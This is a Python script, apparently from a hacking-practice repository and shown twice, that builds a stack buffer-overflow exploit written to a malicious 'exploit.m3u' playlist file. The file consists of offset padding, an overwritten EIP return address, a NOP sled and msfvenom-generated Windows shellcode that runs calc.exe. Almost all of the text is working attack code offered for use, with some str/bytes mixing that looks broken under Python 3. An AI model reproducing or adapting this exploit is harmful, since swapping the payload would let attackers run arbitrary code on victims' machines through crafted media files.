HACKE-RC/exploit.py

## exploit.py
from struct import pack

offest = 1012
eip = pack("<I", 0x10022F07)
nops = "\x90"*16
size = 1100

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x1a" -f py Encoder=PexAlphaNum
buf =  b""
buf += b"\xda\xdb\xd9\x74\x24\xf4\xba\x2c\x59\xcf\x98\x58\x2b"
buf += b"\xc9\xb1\x31\x31\x50\x18\x03\x50\x18\x83\xe8\xd0\xbb"
buf += b"\x3a\x64\xc0\xbe\xc5\x95\x10\xdf\x4c\x70\x21\xdf\x2b"
buf += b"\xf0\x11\xef\x38\x54\x9d\x84\x6d\x4d\x16\xe8\xb9\x62"
buf += b"\x9f\x47\x9c\x4d\x20\xfb\xdc\xcc\xa2\x06\x31\x2f\x9b"
buf += b"\xc8\x44\x2e\xdc\x35\xa4\x62\xb5\x32\x1b\x93\xb2\x0f"
buf += b"\xa0\x18\x88\x9e\xa0\xfd\x58\xa0\x81\x53\xd3\xfb\x01"
buf += b"\x55\x30\x70\x08\x4d\x55\xbd\xc2\xe6\xad\x49\xd5\x2e"
buf += b"\xfc\xb2\x7a\x0f\x31\x41\x82\x57\xf5\xba\xf1\xa1\x06"
buf += b"\x46\x02\x76\x75\x9c\x87\x6d\xdd\x57\x3f\x4a\xdc\xb4"
buf += b"\xa6\x19\xd2\x71\xac\x46\xf6\x84\x61\xfd\x02\x0c\x84"
buf += b"\xd2\x83\x56\xa3\xf6\xc8\x0d\xca\xaf\xb4\xe0\xf3\xb0"
buf += b"\x17\x5c\x56\xba\xb5\x89\xeb\xe1\xd3\x4c\x79\x9c\x91"
buf += b"\x4f\x81\x9f\x85\x27\xb0\x14\x4a\x3f\x4d\xff\x2f\xcf"
buf += b"\x07\xa2\x19\x58\xce\x36\x18\x05\xf1\xec\x5e\x30\x72"
buf += b"\x05\x1e\xc7\x6a\x6c\x1b\x83\x2c\x9c\x51\x9c\xd8\xa2"
buf += b"\xc6\x9d\xc8\xc0\x89\x0d\x90\x28\x2c\xb6\x33\x35"


payload = ""
payload += "\x41"*offest
payload += eip
payload += nops
payload += "".join(buf)
payload += "C"*(offest-len(eip)-len(nops)-len(buf))

file = open("exploit.m3u", "w")
file.write(payload)
file.close()
	from struct import pack

	offest = 1012
	eip = pack("<I", 0x10022F07)
	nops = "\x90"*16
	size = 1100

	# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x1a" -f py Encoder=PexAlphaNum
	buf = b""
	buf += b"\xda\xdb\xd9\x74\x24\xf4\xba\x2c\x59\xcf\x98\x58\x2b"
	buf += b"\xc9\xb1\x31\x31\x50\x18\x03\x50\x18\x83\xe8\xd0\xbb"
	buf += b"\x3a\x64\xc0\xbe\xc5\x95\x10\xdf\x4c\x70\x21\xdf\x2b"
	buf += b"\xf0\x11\xef\x38\x54\x9d\x84\x6d\x4d\x16\xe8\xb9\x62"
	buf += b"\x9f\x47\x9c\x4d\x20\xfb\xdc\xcc\xa2\x06\x31\x2f\x9b"
	buf += b"\xc8\x44\x2e\xdc\x35\xa4\x62\xb5\x32\x1b\x93\xb2\x0f"
	buf += b"\xa0\x18\x88\x9e\xa0\xfd\x58\xa0\x81\x53\xd3\xfb\x01"
	buf += b"\x55\x30\x70\x08\x4d\x55\xbd\xc2\xe6\xad\x49\xd5\x2e"
	buf += b"\xfc\xb2\x7a\x0f\x31\x41\x82\x57\xf5\xba\xf1\xa1\x06"
	buf += b"\x46\x02\x76\x75\x9c\x87\x6d\xdd\x57\x3f\x4a\xdc\xb4"
	buf += b"\xa6\x19\xd2\x71\xac\x46\xf6\x84\x61\xfd\x02\x0c\x84"
	buf += b"\xd2\x83\x56\xa3\xf6\xc8\x0d\xca\xaf\xb4\xe0\xf3\xb0"
	buf += b"\x17\x5c\x56\xba\xb5\x89\xeb\xe1\xd3\x4c\x79\x9c\x91"
	buf += b"\x4f\x81\x9f\x85\x27\xb0\x14\x4a\x3f\x4d\xff\x2f\xcf"
	buf += b"\x07\xa2\x19\x58\xce\x36\x18\x05\xf1\xec\x5e\x30\x72"
	buf += b"\x05\x1e\xc7\x6a\x6c\x1b\x83\x2c\x9c\x51\x9c\xd8\xa2"
	buf += b"\xc6\x9d\xc8\xc0\x89\x0d\x90\x28\x2c\xb6\x33\x35"


	payload = ""
	payload += "\x41"*offest
	payload += eip
	payload += nops
	payload += "".join(buf)
	payload += "C"*(offest-len(eip)-len(nops)-len(buf))

	file = open("exploit.m3u", "w")
	file.write(payload)
	file.close()